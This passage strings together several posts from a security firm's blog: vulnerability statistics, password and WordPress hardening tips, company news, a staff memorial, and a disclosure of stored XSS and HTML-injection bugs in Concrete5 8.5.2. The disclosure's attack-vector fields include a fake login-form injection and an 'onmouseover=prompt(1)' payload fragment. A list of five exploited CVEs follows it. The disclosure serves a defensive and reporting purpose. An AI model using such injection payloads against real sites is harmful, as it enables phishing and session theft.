this is not always the case but you get the idea. Cybersecurity is a keystone of doing business on the Internet. It is as important as the quality of your web application; how the user interacts with your product or service and encourages clients to use your service if they can be assured there is a decent level of security surrounding their data and transactions.   As a security practitioner or a technologist, we may encounter cynics questioning the value of cybersecurity or you may have to justify why investment needs to be made into cybersecurity in order to keep the organization on a strong footing. The following are ways to demonstrate value.     Why are we doing cyber? Measure, measure, measure... Consider metrics but in terms of explaining to the business let's focus on some easily understandable ones such as: Discovered Vulnerabilities (Internal and public facing) How many vulnerabilities are we discovering across the business as a whole? Which Business units / Locations appear to be more vulnerable? What is the average Risk (Risk Density) of discovered vulnerabilities? Which critical services are subject to vulnerabilities? Speed of Remediation & Patching How quickly are we fixing Critical and High Risk vulnerabilities.? How quickly are we patching and how often do we audit for non-patched systems? Location of Vulnerabilities What is the percentage of public facing vulnerabilities vs Internal/Non-public vulnerabilities? What is the risk profile of vulnerabilities based on location or exposure of the system? Source of Vulnerabilities How many vulnerabilities are patch related? How many vulnerabilities are application/developer related? How many vulnerabilities are related to outsourced or B2B systems? Potential Compliance Violations How many vulnerabilities violate compliance or quality standards (PCI/CIS/ISO etc)? What is the business impact of non-compliance based on the discovered vulnerabilities? Detected Intrusion Attempts How many intrusion attempts are being observed for a given time period? What is the source of the intrusion attempts (Internal/External). What type of intrusion attempts are being observed? Is the intrusion against a service with known vulnerabilities? Peer relativity How is the organization fairing compared to peer or global average in terms of mean time to remediate (MTTR), Risk density, Patching speed? Vulnerability Discovery Cadence, System Deployment & Continuous Monitoring Tracking how often vulnerability assessment is occurring and which systems are in scope. How many systems are exposed to the public internet and what services are on the endpoints? How many new systems were deployed in the last period and what do they do? These metrics can sometimes be difficult to track and nurture which is a challenge. Leveraging a risk dashboard covering both network / host and application layer risk metrics which is something worth considering. There is a trend towards integration of related systems to achieve this and something Edgescan has been dedicated to achieving for the past 5 years. Edgescan provides unparalleled vulnerability assessment and penetration testing monitoring, coupled with real-time continuous asset & API discovery for some of the worlds largest organizations.     ### Edgescan Partners with BSI to Deliver Safe and Secure Client Solutions Edgescan, providers of the award winning Fullstack Vulnerability Management™ range of services, today announces its partnership with BSI, the business improvement company. The partnership will enable BSI clients to access Edgescan’s Continuous Vulnerability Management, API Security Assessments, Penetration Testing as a Service (PTaaS) and Application Testing services, which can be tailored to meet their customer’s priorities.      Stephen O’Boyle, Global Practice Director - Cyber, Risk and Advisory at BSI said: “We are delighted to be partnering with Edgescan who have been named highest scoring application security solution by Gartner Peer Insights, the peer-driven ratings and reviews platform; and also won the Computing Security ‘Winners’ Award in 2020.”   “This partnership means we can offer clients a more in depth and resilient suite of security testing services that will meet the customer’s diverse security and compliance requirements in this fast-changing environment. Implementing these solutions ensures that an organizations’ critical assets and information are properly protected from avoidable threats and that organizations can, with confidence, meet their regulatory requirements by delivering safe and secure services to the benefit to their customers”, O’Boyle added.    Eoin Keary, Founder & CEO, Edgescan, stated: “It’s great to be partnering with the team at BSI who are committed to helping their clients in delivering safe and secure services that are fit for purpose and offer clear benefit to the customer. When it comes to Edgescan, the client’s critical assets and information needs to be the primary focus regardless of the company’s size. Edgescan meets the exacting requirements of CREST™; and holds National Cyber Security Centre’s Cyber Essentials Scheme and ISO 27001:2013 certifications and we look forward to BSI leveraging the services we can provide and working with them to facilitate their clients’ needs.”   BSI’s client solutions are supplied through information security-minded practices that enable clients to protect their sensitive data and reduce the risk of threat to their people, reputation, and finances. The BSI Consulting Services team provides a range of solutions to help organizations address challenges in cybersecurity, information management and privacy, security awareness and compliance.    Edgescan’s award-winning platform will be added to BSI’s offering, enriching their portfolio of solutions aimed at helping business grow with security in mind. Edgescan’s continuous vulnerability intelligence accurately identifies vulnerabilities and exposures across the full stack. All threats are verified by cybersecurity experts, providing exploitable risk and remediation guidance when the client needs it.  Read more... Securing APIs with Confidence Collaborating with BSI allows us to enhance the security of complex systems. Our API Security Testing service ensures your APIs are secure, reducing the risk of breaches in your integrations. With offices in Dublin and New York, we’re your trusted partner for robust API protection. ### 2020 Vulnerability Statistic Report Press Release Over 65% of the CVEs Edgescan found in 2020 are more than 3 years old, with 32% dating back to 2015 or earlier  Edgescan’s 2021 Vulnerability Stats Report Offers a snapshot of the overall state of cyber security globally    DUBLIN, 15th FEB 2021 - Edgescan, providers of the award winning Fullstack Vulnerability Management™ range of services, today releases the 2021 Vulnerability Stats Report that, for the sixth year running, offers unique insight into the global security landscape from a trends and statistics perspective, as well as a snapshot of the overall state of cyber security globally. This year's report takes a deeper look at vulnerability metrics from a known vulnerability (CVE), Malware, Ransomware and visibility standpoint (exposed services), coupling both internal and public Internet-facing systems.    Edgescan’s 2021 Vulnerability Stats Report aims to demonstrate the state of full stack security based on thousands of security assessments performed globally, as delivered by Edgescan during the past year.    Some of the key findings include:  Remote desktop (RDP) and Secure Shell (SSH) exposures increased by 40%, likely due to the increase in remote working due to Covid-19. This resulted in a massive increase in discovery of vulnerabilities such as the infamous Bluekeep (CVE-2019-0708), the critical bug behind the Wannacry attack of 2018  Of a sample of 1,000,000 endpoints profiled in 2020, 21,070 of the endpoints had an exposed database. This points to a serious lack of asset inventory and visibility  Over 65% of the CVEs Edgescan found in 2020 are more than 3 years old, with 32% dating back to 2015 or earlier  The oldest vulnerability discovered in 2020 in the wild: CVE-1999-0517 is 21 years old, but some systems are still exposed  It takes organisations an average of 84 days to remediate high risk vulnerabilities  SQL injection endures: 51.7% of discovered critical risk issues related to SQLI on the web application layer. SQL could allow attackers to exploit a data breach, tamper with existing data, and even become administrators of the database server in specific cases  The most common malware-related vulnerabilities are between 1 and 3 years old  Malware is exploiting common old vulnerabilities, which could easily be patched  By far the most insecure framework on the internet is PHP, accounting for 22.7% of all critical risks discovered in 2020  13.4% of all critical risks discovered in 2020 related to unpatched, unsupported or out-of-date systems  33% of discovered vulnerabilities on public Internet facing web applications were High or Critical Risk, while 50% of discovered vulnerabilities on Internal web applications were High or Critical Risk.  “I am still as passionate as ever in compiling this report and delving into the underlying data. We still see high rates of known (i.e. patchable) vulnerabilities which have working exploits in the wild, used by known nation states and cyber criminal groups. So yes, patching and maintenance are still challenges, demonstrating that it is not trivial to patch production systems”, said Eoin Keary, CEO and founder of Edgescan.     “This report provides a glimpse of a global snapshot across dozens of industry verticals and how to prioritize on what is important, as not all vulnerabilities are equal. This year we call out which threat actors are leveraging discovered vulnerabilities, which should be food for thought,” he added.    The value of Edgescan’s data has become more evident as their unique dataset is now a regular part of other annual security analysis reports, such as the OWASP Top 10 and Verizon DBIR.      To get a copy of the 2021 Vulnerability Statistics Report, click here ### Good Password Management While online can be extremely fantastic, a key to staying secure is the creation of long and strong passwords.    Tips on creating a traditional password:   Have a minimum of 12 characters Include the use of Numbers, Symbols, Uppercase and Lowercase Letters Stay clear of dictionary passwords, such as the Edge Scan Don't substitution obvious letters for numbers, such as 3dge Sc4n   When creating a password, try something such as '$c@nEdg3123#', it's complex with the variety of all tips given above.    An edgescan excellent tip for creating a rememberable password would be via the use of passphrases. Try something like 'corr3ct3dgesc@n_i$#th3BEST!', doing this we are taking completely random and independent of themselves words in order to create a passphrase. Remember even if the password is complex, it is recommend to not reuse it on multiple accounts.   Following on from the traditional tips, the use of Password Managers are a great way to ensure your passwords are randomised, of suitable length and of complex security.    Password Managers There are many password managers widely available, one to recommend is LastPass(https://lastpass.com/create-account.php). It offers a free version and with compatibility on Windows, MacOS, Linux, Android, iPhone and iPad. Along with browser extensions for Chrome, Firefox, Safari, Internet Explorer, Edge and Opera.   It is easy to use, with many features from access from all devices to password generators along with Multifactor authentication.   Multi Factor Authentication Although having a complex password or the use a password manager can be great, don't let the security be weakened by not ensuring you've enabled 2 Factor Authentication across all your accounts. Most platforms nowadays should offer 2FA in multiple forms, this can generally be found within the security settings of your account.   In order to set up 2FA, you can receive your codes from any of the following: SMS (Text Message) Email Authenticator App such as Google's Authenticator App Authentication Notifications Hardware Authentication Devices such as a YubiKey   Stay safe, create those complex passwords, use a password manager and remember to always enable 2FA! Subscribe to the Edgescan blog to receive updates. Emma Heffernan Security Analyst at Edgescan   ### Look out for Miss Information: How to explain disinformation to children Have you ever questioned if what you read online is real or fake? The internet is evolving - information can come from anywhere, be that reputable news sites, social media or articles without citation. It can be obvious to some which of these are trustworthy, however especially for the youth this isn’t so easy. We already observe the mass circulation of false information. Now more than ever, it is of the utmost importance to educate the youth on how to distinguish truth from lies and fact from fiction. The sharing of false information online has two main sources: Disinformation - The act of deliberately sharing misleading information which you know to be false but portray to be true. Misinformation - This is the act of sharing false information unbeknownst to you. There are many reasons why people especially those of a young age, engage and believe everything they see. It is an engagement, whether it is seen as a form of bullying, popularity or scaremongering, it leads to more serious consequences. Children as young as 9 years old have connected devices. This opens the world of social media, online gaming and chat communications and much more. In recent years there have been numerous headline worthy examples of disinformation, some include, flat earth theories, presidential elections and a hoax story that a well-known celebrity had passed away due to suffering a heart attack. We must remember how naive children can be, most believing everything they are told. Online challenges have been a fad in recent years, from beneficial challenges such as the “Ice Bucket Challenge” to unfortunate ones such as the “Tide Pod Challenge”. Recently, a Spanish article shared that over 800 kids were hospitalised due to drinking hand sanitiser, allegedly as part of a popular social media challenge. The amount of false information on the internet has become so immense that there are now entire websites based on the idea of spreading it, some of these “news” sites are known as satirical. Their goal is not to spread misinformation but instead to make it seem extremely unlikely to occur. Their recent growth in popularity can be attributed to both the spreading of jokes and the more disappointing of those is the misunderstanding of the humour and believing it to be true. In the past satirical sites have posted articles which ended up becoming true. This is similar to “The Simspons” effect or “The Infinite Monkey Theorem”. These sites can be a grey area, yes they provide humour however they also mislead. With this flood of information, be it true, false or satirical – it is more important than ever for the youth to be able to detect fake news. Some ways of doing so, is by asking these 6 simple questions: 1. Where did you find this information? 2. Do you trust the URL? 3. Is it a well-known source? 4. What is the source of the information? 5. Is there an author attached to the piece? 6. What do you gain from sharing this information? As the old Irish proverb goes – “a lie travels farther than the truth”. Always be wary of what you share online, make sure you have reliable resources to back you up! Subscribe to the Edgescan blog to receive updates. Emma Heffernan Security Analyst at Edgescan   ### Edgescan Features You Really Need To Know About As you may have noticed, the Edgescan platform has recently rolled-out an new UI and here are the features you really need to know about.  We are proud of the award-winning design and the improved functionality, feedback from users has been fantastic.    Validate Yourself All application layer vulnerabilities can be recreated by copying a CURL or Raw request. This helps you understand the entire request and steps taken to reproduce the vulnerability. Retest You can retest vulnerabilities on demand. So you've fixed a vulnerability, now hit "Retest" and bingo, Edgescan will validate to see if the issue is mitigated. You can also retest all vulnerabilities or select whichever ones you want to retest via the Assets page. Retest via the API is via the retest endpoint On-Demand assessment If you need an on-demand assessment, say you just deployed a new feature or need to get an assessment randomly you can do this via the Assets page "Start" or the API. Start an on-demand assessment via the API. Metrics The new Edgescan UI provides a huge array of metrics From MTTR, Exposure factor, Risk over time and Asset Risk API Integration Generate WAF Rule:  You can auto generate a Web Application Firewall rule for specific WAF's. This may help you virtually patch the vulnerability if you can't make the code fix. This can be done also via the API. Setting up events: Events keep you informed - Keep informed based on what matters to you. Be it a newly discovered vulnerability, a closed vulnerability, a newly discovered host, an API discovery, ports open on a host etc. Events can integrate to the likes of Jira, Teams, Slack, Email, SMS etc   Like what you see? Contact Edgescan Sales to arrange a POC or Request a Demo. Subscribe to the Edgescan blog to receive updates. ### Edgescan UI wins GOOD DESIGN Award We are delighted to announce that the new Edgescan UI redesign has won a GOOD DESIGN Award in the category for Mobile Application 2020 design. The new Edgescan UI was designed in collaboration with Design Partners (Marija Cosic, Kevin Dunne and Cormac Ó Conaire) based in Bray alongside our own team consisting of David Kennefick, Matt Craig, Joe Douglas and Owen Money. Below are some of the innovative design elements included in the Good Design Awards entry and impressed the judges.   Challenge The main challenge was to take the old Edgescan platform that displayed a high amount of information from scanning and identifying vulnerabilities and at the same time displaying exactly what the customers need to see which was the various risks that the platform has identified in an environment free of clutter and non-essential information. We wanted to save time for our customers and improve efficiency in how they use our platform. Design One element of the story being told by the design team was around 'noise-reduction' as the USP was to be part of all design decision which was simplifying all complexity, reducing noise of the UX and only exposing the users to relevant information. All of these decision s will also delivers even more time saving for the clients. “Support costs and overhead costs is reduced by introducing more intuitive design. Combined with more ways to authenticate, it’s much easier for organizations to train new staff on the Edgescan platform.” - David Kennefick, Product Architect, Edgescan Our final colour palette was made fully colour-blind accessible, while remaining clear and consistent. The traffic light systems was introduced to all critical areas so the information was understandable even for the first use of the product. Conclusion and Result Great design reflects both the customers needs and the brand promise. Our customers are now able to generate reports faster then ever before and view vital information quickly at just a glance. This represents a huge time saving for our clients.” - David Kennefick, Product Architect, Edgescan. In the end, we followed through with the our design ethos of reducing noise on our platform and standing out from our competitors. The GOOD DESIGN Awards The Chicago Athenaeum Museum of Architecture and Design and Metropolitan Arts Press Ltd. present the Museum's annual GOOD DESIGN Awards Program for the most innovative and cutting-edge industrial product, and graphic designs produced around the world. ### Introducing Edgescan's New Dashboard We are delighted to announce that the new Edgescan user front-end interface will be released next week, and we're really excited to get it in front of our customers. So what can you expect when you log in? A cleaner design We've spent a lot of time designing a cleaner interface, with better use of space and colour to reduce noise, and this effort is visible on every page. We've also written an extensive component library to allow us to rapidly build new functionality going forward. We're grateful to design partners who worked closely with us to create our design language. Dashboard Our revamped dashboard combines the best parts of our old dashboard and metric pages. We've designed it to show you your current security posture - and your progress towards improving it - at a glance. Easier Reporting We know how important reporting is to our customers, and now it's never more than a click away. Improved filtering for assets We know that many customers need more tools to manage their assets, so we've made our powerful querying functionality available on the assets page. Want to see which of your authenticated assets are currently being scanned? Now you can. Saved Filters You can save your most commonly used filters for the asset, vulnerability and host pages. Your saved filters are only a click away on the dashboard, placing the information you need at your fingertips.   This release is the culmination of a year of hard work by our core team. We started this project with the aim of delighting our customers, and building a firm foundation for the future, and we're very proud of the result. We're sure our users love it as much as we do! ### Top tips on how to secure a WordPress website WordPress is one of the most popular blogging and website platforms currently on the web. It is currently estimated that there are approximately 1.3 billion active websites at this time, it is believed that 445 millions of them are built with WordPress. Due to the popularity of the platform though and the nature of open source, there is a constant battle of balance between security on the core platform and the external plugins and themes. Below are some tips on how to simply improve the security of a WordPress website.   1: Don't use a default username Quite often when setting up a new WordPress website, most users just use the default admin username. Don't do this, rather have a name instead for the administrator username as quite often there are those that will try to brute force the admin username on WordPress login URLs.   2: Change your login URL and hide your WordPress This can be simply done with a number of plugins, both hiding your login page for your WordPress website and hiding any sign that the website is built with WordPress is a way to deter some of those that wish to hack your website.    3: Enable 2FA on your WordPress Ensure to enable 2 Factor Authentication on your WordPress for that extra layer of security. This can be done by using a WordPress defense plugin such as WordFence which allows you to use Google 2FA solutions and has a number of other features that will help to secure your website.   4: Update your Core, Plugins & Themes at all times Due to the dynamic nature of open source, WordPress are constantly releasing new security updates for the core platform. Plugins & Themes should also be regularly updated and be careful of those that are no longer supported by developer or have been forgotten about.   5: Delete and remove unnecessary Plugins & Themes If you don't use a plugin or theme, delete it from your WordPress install as they can add more opportunities and vulnerabilities on your website.   6: Whitelist your IP for Admin login Another form of defense you can take for your WordPress website is to whitelist your IP (if it's static) to allow you to login from only allowed locations to edit the website. This will further reduce opportunities of hackers getting admin access on your website.   7: Ensure your Hosting is secure such as cPanel. A lot of WordPress websites use a web hosting control panel such as cPanel, always make sure that you use a strong password and if possible enable 2FA to ensure better security. Often enough this is neglected and a compromise of the web hosting control panel is just as bad if not worse than the compromise of the WordPress website.   8: Use a strong password This should go without saying but always use a strong password policy on your WordPress website to ensure that your WordPress is secure, use a combination of lower and upper case with symbols and numbers. A new method also to add in is a long phrase to make it even harder to crack.   9: Defend your users through the blog Often enough if your website has a blog that updates regularly, make sure to create another user for just posting on the blog and do not use the Admin account to post blogs. This will make it harder for hackers to discover which account is the administrator one if they can't see the name and if they do somehow manage to gain access to the account that's blogging they will only have very few permissions on the backend.   10: Disable comment fields and filter all contact forms If you do not use the comment section on the website, make sure to disable them as they will often be spammed and could be vuln to Stored XSS. Not only that, also make sure to filter all contact forms to allow only certain symbols allowed to ensure no XSS can be done on that either.     WordPress is a constant evolving platform and while it does have a lot of issues due to being open sourced, with careful attention and being prepared you can advert a lot of vulnerabilities it's often plagued by being careless or neglect.  Subscribe to the Edgescan blog to receive updates.   Theo Goyvaerts Edgescan   ### Looking Back on Edgescan in 2020 As we take a quick look back on 2020,  we hope 2021 brings you all the success in the world. While 2020 didn’t go as expected, at Edgescan we will take the positives out of what has been, for many reasons, a tough year.  The year started on a high as we celebrated our 6th Birthday, released our annual Vulnerability Report and attended RSA and other live conferences before Covid-19 hit.  The initial impact was for our whole company to seamlessly go fully remote and we have been successfully operating in this way since.  Looking back over Edgescan in 2020, here’s a short summary of some of the activities, events and interactions Team Edgescan participated in.  January  - Celebrated our 6th Birthday    February   - Released the Edgescan 2020 Vulnerability Report  - Attended RSA & Slándáil Global Security Conferences    March  - International Women’s Day Celebrations at Edgescan HQ  - Edgescan moves all staff to work from home with Business as Usual!  - Sponsorship of Hack Trinity CTF  - Sponsors BSides Dublin    April  - Pentesting Workshop with students at TUDublin with Ciaran Byrne, Dearbhail Kirwan and Conor Cronin RIP.   May  - Hosted a Webinar with PFH Technology  - Contributed to the Verizon Data Breach Investigation Report    June  - Edgescan won ‘Best Vulnerability Management 2020’ at SC Awards  - Runner up as Highly Commended for ‘Best Enterprise Security’ at the SC Awards  - Highly Commended Student of the Year – Edgescan team member Emma Heffernan  - Virtually attended Infosecurity Europe 2020  - Webinar on Edgescan API Discovery & New Developments  - Edgescan received a €10.5 Million Investment from BGF - We joined Barrier Networks for a Webinar    July  - Attended Securing Financial Services Virtual Summit  - Hosted a webinar on Selling Edgescan: The ABCs and 123s  - Shortlisted at the CRN Sales & Marketing Awards 2020  - Joined a webinar with David Sparks on Hacking Automation     August  - We hosted an Edgescan Webinar Series on Visibility  - Sponsorship of Troy Hunt Blog  - Q&A with Troy Hunt from Team Edgescan  -  Virtual Webinar on Filling the Gaps in Traditional Vulnerability Management  - Our EdgeDogs celebrated National Dog Day!    September   - Edgescan Webinar Series on Validation  - Webinar on API Security and Assessment  - Attended the Future of Cyber Security Virtual Conference  - ZeroDays CTF sponsored, however postponed until the new year!    October   - Eoin Keary spoke at Connect 2020 Virtual  - We sponsored ShellCon 2020  - James Mullen won Best Ethical Hacker / Pentester  - Sponsors of Brian Krebs on Security Blog  - Hosted another Webinar with Rahim and Dearbhail on Continuity in Vulnerability Management  - Rahim spoke at the Media and Entertainment Day Conference  - Hosted another webinar on ‘Closing the Loop Faster for Security Risk’  - Teamed up with BPS for a ‘No Cost API Discovery Assessment’ Webinar    November  - Eoin Keary spoke at Cyber Security and Cloud Expo in North America Virtually  - We were announced as Finalists in 3 categories for the Computing Security Awards    December  - We collaborated with TUDublin to deliver a Pentesting workshop  - Winners are Computing Security Awards – ‘Pen Testing Solution of the Year 2020’ & ‘Best Cloud-Delivered Security Solution 2020’  - Hosted our Final Webinar for 2020 with Accutech on Ethical Hacking    Rounding up 2020, while it was challenging and an extremely tough year, we believe we’ve come out with new ways of interactions, from daily virtual meetings to team 'Quarantini' cocktail nights to webinars. We found a new way to learn, grow, develop and succeed. With that said, we hope as much as 2020 challenged us it has made us stronger and we will rise to whatever challenge 2021 has for  #TeamEdgescan! ### More Vulnerabilities Discovered in Concrete5 by Edgescan Researcher This blog post will address recent Cross Site Scripting (XSS) Stored & HTML Injection Stored vulnerabilities discovered by Edgescan Senior Information Security Consultant, Guram Javakhishvili. These vulnerabilities were discovered while validating alerts as part of Edgescan’s human intelligence verification. These discoveries are shared with clients so they can evaluate and mitigate the risks. The vendor is also notified so they can resolve the issues and improve the overall security of the application. Concrete5-8.5.2 is vulnerable to Cross Site Scripting (XSS) Stored & HTML Injection Stored   Software: concrete5 https://www.concrete5.org/ Vulnerability:  Cross Site Scripting (XSS) Stored & HTML Injection Stored Vulnerable component:  Contact Us Page & Private Messaging Vulnerability disclosed at:  https://hackerone.com/reports/768327 & https://hackerone.com/reports/768313 Vulnerable version:  8.5.2 Stable Fixed release:  8.5.4 Concrete5 is an open source content management system (CMS) solution written in PHP. Complex websites made easy. A point and click, free CMS that creates websites. Concrete5 is used by major brands around the world, such as; GlobalSign, U.S.Army, REC, BASF, and many more, see full list here. Concrete5 is designed for ease of use, for users with a minimum of technical skills. It enables users to edit site content directly from the page. concrete5 version 8.5.2 suffer from persistent (Stored) cross site scripting and html injection vulnerabilities. Insufficient validation of user input on both authenticated & unauthenticated parts of the concrete5 application exposes the application to persistent cross site scripting (XSS) & HTML Injection vulnerabilities. These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server.   1. Cross Site Scripting (XSS) Stored - Private messaging Cross-site scripting is a flaw that allows users to inject HTML or JavaScript code into a page enabling arbitrary input. Stored XSS allows an attacker to embed a malicious script into a vulnerable page, which is then executed when a victim views the page in this case administrative user. It is possible for a lowest privileged user with access to private messaging to send private message to Administrator user with malicious Cross-site Scripting (XSS) payload. Detailed description and steps to reproduce this bug: https://hackerone.com/reports/768313 Resolution:  Fixed in 8.5.4 Vulnerable component:  Private messaging List of vulnerable parameters:  msgBody Attacker Vector:  Impact:  An attacker could exploit these vulnerabilities to execute arbitrary script code in a user's browser in the context of the affected site or execute arbitrary code on the server. Stored XSS allows an attacker to embed a malicious script into a vulnerable page, which is then executed when a victim views the page in this case administrative user.   2. Unauthenticated HTML Injection Stored - ContactUs form concrete5 is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. An unauthenticated (public user) can inject arbitrary web script or HTML via Contact Us form in the body of the message. Message gets sent to an administrator and when the message is being viewed or clicked by an administrative user, he/she will be redirected to a malicious site. Detailed description and steps to reproduce this bug: https://hackerone.com/reports/768327 Resolution:  Fixed in 8.5.4 Vulnerable component:  Private messaging List of vulnerable parameters:  msgBody Attacker Vector: 
Phishingpage :

Username :

Password :



onmouseover=prompt(1);// Impact:  An attacker could exploit these vulnerabilities to execute arbitrary script code in a user's browser in the context of the affected site or execute arbitrary code on the server. HTML Injection vulnerability might lead us to Cross-Site Scripting, Server-Side Request Forgery(SSRF) attacks or open a Phishing page.   Steps you should take to secure your CMS applications from hacking XSS Attack Payload Types: • Session hijacking • Site defacement • Network scanning • Undermining CSRF defenses • Site redirection/phishing • Data theft • Keystroke logging • Loading of remotely hosted scripts • These bugs have already been addressed by Concrete5 and the stable fixed release is out already, version: 8.5.4 • Several defensive techniques needed depending on context to prevent XSS attack, but in some cases, it can be much harder depending on the complexity of the application and the ways it handles user-controllable data. Example solutions: i. Content security policy (CSP) is a browser mechanism that aims to mitigate the impact of cross-site scripting and some other vulnerabilities. ii. Input Validate and Output Encode iii. Use another layer of protection (WAF) Web Application Firewall, which automatically protects against all or most of the vulnerabilities. Install security plugins to actively prevent hacking attempts. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. These plugins notify the weaknesses inherent in each platform and halt the hacking attempts that could threaten your application. WAFs may come in the form of an appliance, server plugin, or filter, and may be customized to an application. • Crucially important to keep your installed scripts and CMS platforms up to date. Create a regular schedule to update or patch your CMS, and all installed plugins and themes. Ensure all components are up-to-date. • At a minimum weekly update is equally important. Regularly backup the CMS and its underlying database. • Subscribe to a regularly-updated list of vulnerabilities for the specific CMS being used. • More training and resources available from Edgescan blog post, ‘Secure Application Development Training Material’ & ‘XSS Attack & Defense’ Subscribe to the Edgescan blog to receive updates.   Guram Javakhishvili Senior Information Security Consultant Edgescan   Securing CMS Platforms with DAST Content management systems can be an easy target for attackers. Our Dynamic Application Security Testing (DAST) identifies and remediates vulnerabilities in platforms like Concrete5. Operating from Dublin and New York, we ensure your CMS is secure from exploitation. ### Edgescan Identifies Top 5 CVEs Weaponized by Cyber Criminals As we put the finishing touches to the Edgescan 2021 Vulnerability Statistics Report it has become clear that criminals are leveraging known, unpatched vulnerabilities in order to launch attacks on unsuspecting organisations.  We have compiled a list of the top 5, the list includes the CVE, its impact and the threat actors taking advantage of the vulnerabilities. At Edgescan, we do what we can to inform the global security community so knowing this list of the Top 5 CVEs Weaponised by Cyber Criminals is useful.  The Edgescan 2021 Stats Report will be published in February 2021, register your interest to receive a copy straight to your inbox when it's released.     1. CVE-2019-0708 - Often known as the BlueKeep CVSS 2 Score  10  Impacted Systems  Microsoft Windows  Description  A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services Remote Code Execution Vulnerability'.  Impact  Someone can use Remote Desktop feature of Windows to login onto your pc and take control. There is total information disclosure, resulting in all system files being revealed  Threat Actor  Kelvin SecTeam (Venezuela, Colombia, Peru)  Reference Link  CVE-2019-0708 : A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unau (cvedetails.com)    2. CVE-2017-0143 - DOUBLEPULSAR Payload use this CVE CVSS 2 Score  9.3  Impacted Systems  Microsoft SMB  Description  The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.  Impact  A remote user can execute arbitrary code on the target system.  A remote user can obtain potentially sensitive information on the target system  The WannaCrypt malware was using this exploit.  Threat Actor  APT3 (China), Calypso (China)    3. CVE-2017-5638  CVSS 2 Score  10  Impacted Systems  Apache Struts  Description  The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.  Impact  A remote user can execute arbitrary operating system commands on the target system.  Threat Actor  Lazarus Group (North Korea)    4. CVE-2017-5715 - Also known as Spectre CVSS 2 Score  4.7  Impacted Systems  ARM, Intel  Description:  Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.  Impact:   A local user can run specially crafted code to cause the CPU to speculatively execute an indirect branch to leak memory contents from another process into a CPU cache and then read the contents of the cache . A local user can view arbitrary virtual memory contents on the target CPU device   Threat Actor  Unknown      5. CVE-2017-10271 - Used by CyrptoMiners CVSS 2 Score  5  Impacted Systems  Oracle WebLogic Server  Description  A remote user can exploit a flaw in the Oracle WebLogic Server WLS Security component to gain elevated privileges.  Impact  A remote authenticated user can obtain data on the target system.  A remote user can modify data on the target system.  A remote user can cause denial of service conditions  Threat Actor  Rocke Gang (Chinese Cybercrime)  Reference Link  Oracle WebLogic Server Flaws Let Remote User Gain Elevated Privileges, Modify Data, and Deny Service on the Target System - SecurityTracker    Visit our Vulnerability Statistics Resources for more information and to view the Edgescan 2020 Stats Report. Register your interest to receive one of the first copies of the 2021 Report, due in February 2021.   ### Remembering Conor Cronin Edgescan lost a team member four weeks ago.  Conor wasn’t just a member of a team. He was our friend, our brother, someone who always cheered you up if you needed cheering up. He was the one you always enjoyed having a pint with.   He was funny to the bone.   Conor started with us as an intern almost 4 years ago, and I could tell on his first day that he would be around for a long time. I played pool with him that day and he reciprocated any sledging with an interest. He wasn’t very good! Fast forward 3 years, and he beat me on the same table without me potting a ball. It was the same with work, he was better, he just needed to grow into it. He was the first person I asked to be a mentor each time someone new started, as he was a great advertisement for the type of person we have in the company. He was highly intelligent and eager to pass on the knowledge he had and could do this with any type of personality.   I’ve spoken to anyone that would listen over the years about how I enjoy working at Edgescan, about the people I work with. It sounds like a cliché or something that companies bandy about a lot, but we’ve always tried to keep the ‘start-up atmosphere’ as we grew into a global organization. At times it’s been tough or it’s seemed like we were moving away from that, but then as you’re leaving the office one evening and Conor drives by with his middle finger raised you realize nothing has changed at all!   We are like a family, we have our kooky uncles and quiet cousins with weird hairstyles, cool big sisters and geeky little brothers, that aunt that drinks a little bit too much. Conor was the bright brother that lit up a room. These are the people we spend most of our waking day with, the people that know us inside out, the ones you want to impress and have fun with. So when we lose someone it hits us like a ton of bricks, everything is now different. I'm not sure what else to say about it.   Conor had an accident while running to raise money for Movember. His family have asked for donations for this worthy cause, so if you have a couple of euros, dollars, or pesos please feel free to donate. If not, then that's fine too. https://ie.movember.com/mospace/14321044   To date and thanks to Conor, Team Edgescan has raised over €120,000, of that, over €114,000 was raised in Conor's name making him the top fundraiser in the world for Movember.  Conor's loss was felt far and wide, his loved ones and organisations he touched have dedicated events in his memory. Irish artist Maser and singer-songwriter Damien Dempsey collaborated to create an original piece of artwork for #Movember Titled ‘Meet Me At The Bridge’, the piece is inspired by conversations surrounding mental health and was brought to life on the iconic Samuel Beckett Bridge in remembrance of Mo Bro Conor. Read more.        RIP brother, we miss you!         Ciaran Byrne Head of Platform Operations Edgescan   Dublin 04/12/2020 ### Edgescan Incorporated in USA Leading Irish cyber security firm, Edgescan, further cements global market expansion with US company incorporation.CEO, Eoin Keary today announced that Edgescan is now incorporated in the USA. He said that “it provides us with a firm foothold in the USA allowing us to be closer to our North American clients." Edgescan has been providing fullstack vulnerability management, cyber security and pen testing services to US based clients for a number of years. US clients include some of the world's largest media corporations and US partners include AON, BPS, Arbala and Tevora. COO, Rahim Jina added, “Edgescan has a growing US-based sales team so being incorporated in the US allows us to aggressively hire and retain local staff. The legal standing gives us the necessary structure to work more effectively with our US customers.”This is an exciting development for Edgescan and part of an aggressive global growth strategy since the recent €10.5M investment from Ireland’s largest growth capital investor, BGF. Edgescan CFO, Eoin Twohig, said ‘Growing our US presence allows us to better serve our customers in North America and will benefit all Edgescan clients”.Dublin 04/11/2020 ### Edgescan Questions & 